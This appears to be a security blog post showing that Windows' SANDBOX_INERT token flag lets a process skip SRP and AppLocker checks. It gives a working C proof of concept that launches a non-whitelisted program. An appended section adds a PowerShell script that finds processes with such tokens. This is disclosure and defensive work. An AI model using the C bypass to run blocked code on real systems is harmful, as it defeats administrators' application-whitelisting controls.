There’s an interesting comment on my Circumventing SRP and AppLocker, By Design post.
In my previous post, I showed a feature to circumvent SRP and AppLocker validation when a DLL is loaded.
The anonymous commenter points out a feature that creates a new process while circumventing SRP and AppLocker: the SANDBOX_INERT flag of the CreateRestrictedToken function allows you to do this.
Per MSDN:
If this value is used, the system does not check AppLocker rules or apply Software Restriction Policies. For AppLocker, this flag disables checks for all four rule collections: Executable, Windows Installer, Script, and DLL.
When creating a setup program that must run extracted DLLs during installation, use the flag SAFER_TOKEN_MAKE_INERT in the SaferComputeTokenFromLevel function.
I wrote a small program to test this:
#define UNICODE
#include <windows.h>
#include <stdio.h>
int main(void)
{
    HANDLE hToken;
    HANDLE hNewToken;
    PROCESS_INFORMATION sPI;
    STARTUPINFO sSI;
    // Open our own primary token so a restricted copy can be derived from it.
    if (OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken))
    {
        // SANDBOX_INERT marks the new token so that SRP and AppLocker checks are skipped.
        if (CreateRestrictedToken(hToken, SANDBOX_INERT, 0, NULL, 0, NULL, 0, NULL, &hNewToken))
        {
            memset(&sSI, 0, sizeof(sSI));
            sSI.cb = sizeof(sSI);
            // Backslashes must be doubled inside a C string literal.
            if (CreateProcessAsUser(hNewToken, L"c:\\test\\Dialog42.exe", NULL, NULL, NULL, TRUE, 0, NULL, NULL, &sSI, &sPI))
            {
                puts("process created");
                CloseHandle(sPI.hThread);
                CloseHandle(sPI.hProcess);
            }
            CloseHandle(hNewToken);
        }
        CloseHandle(hToken);
    }
    return 0;
}
This program starts another program, Dialog42.exe. I’ve configured SRP with a whitelist, and Dialog42.exe is not on it:

But when I use my program with the SANDBOX_INERT flag to start Dialog42.exe, it is allowed to run:

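As an added example (not part of the original post and not Didier's code), here is a PowerShell check a defender can run to find processes whose primary token carries SANDBOX_INERT, which is exactly the condition under which SRP and AppLocker rules are skipped. It queries each process token with GetTokenInformation using the TokenSandBoxInert information class (value 15 in TOKEN_INFORMATION_CLASS), which is the documented way to test a token for this flag. The type name TokenInspect and the function name Test-SandboxInertToken are my own; the script assumes it runs on Windows with enough rights to open the target processes.

```powershell
# Added example: enumerate processes whose token has the SANDBOX_INERT flag set.
# TokenInspect and Test-SandboxInertToken are names chosen for this example.
$source = @"
using System;
using System.Runtime.InteropServices;
public static class TokenInspect {
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern IntPtr OpenProcess(uint dwDesiredAccess, bool bInheritHandle, int dwProcessId);
    [DllImport("advapi32.dll", SetLastError = true)]
    public static extern bool OpenProcessToken(IntPtr ProcessHandle, uint DesiredAccess, out IntPtr TokenHandle);
    [DllImport("advapi32.dll", SetLastError = true)]
    public static extern bool GetTokenInformation(IntPtr TokenHandle, int TokenInformationClass,
        out uint TokenInformation, uint TokenInformationLength, out uint ReturnLength);
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool CloseHandle(IntPtr hObject);
}
"@
if (-not ('TokenInspect' -as [type])) { Add-Type -TypeDefinition $source }

function Test-SandboxInertToken {
    # Returns $true when the primary token of the given process carries SANDBOX_INERT.
    param([Parameter(Mandatory=$true)][int]$ProcessId)
    $PROCESS_QUERY_INFORMATION = 0x0400
    $TOKEN_QUERY = 0x0008
    $TokenSandBoxInert = 15   # TOKEN_INFORMATION_CLASS::TokenSandBoxInert

    $hProcess = [TokenInspect]::OpenProcess($PROCESS_QUERY_INFORMATION, $false, $ProcessId)
    if ($hProcess -eq [IntPtr]::Zero) {
        throw "OpenProcess failed for PID $ProcessId (Win32 error $([Runtime.InteropServices.Marshal]::GetLastWin32Error()))"
    }
    $hToken = [IntPtr]::Zero
    try {
        if (-not [TokenInspect]::OpenProcessToken($hProcess, $TOKEN_QUERY, [ref]$hToken)) {
            throw "OpenProcessToken failed for PID $ProcessId (Win32 error $([Runtime.InteropServices.Marshal]::GetLastWin32Error()))"
        }
        # The information buffer for TokenSandBoxInert is a single DWORD: non-zero means the flag is present.
        $value = [uint32]0
        $returned = [uint32]0
        if (-not [TokenInspect]::GetTokenInformation($hToken, $TokenSandBoxInert, [ref]$value, 4, [ref]$returned)) {
            throw "GetTokenInformation failed for PID $ProcessId (Win32 error $([Runtime.InteropServices.Marshal]::GetLastWin32Error()))"
        }
        return ($value -ne 0)
    } finally {
        if ($hToken -ne [IntPtr]::Zero) { [void][TokenInspect]::CloseHandle($hToken) }
        [void][TokenInspect]::CloseHandle($hProcess)
    }
}

# Sweep every process and report the ones running with a sandbox-inert token,
# i.e. the ones for which SRP and AppLocker enforcement is switched off.
Get-Process | ForEach-Object {
    try {
        if (Test-SandboxInertToken -ProcessId $_.Id) {
            [pscustomobject]@{ Pid = $_.Id; Name = $_.ProcessName; SandboxInert = $true }
        }
    } catch {
        # Processes we are not allowed to open (protected or other-user processes) are skipped.
    }
}
```

Run it from an elevated session to cover processes of other users; a hit for anything other than a known installer is worth a closer look, because a process started the way the post describes shows up here while its image name is still absent from the SRP or AppLocker whitelist.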
Full story: Didier Stevens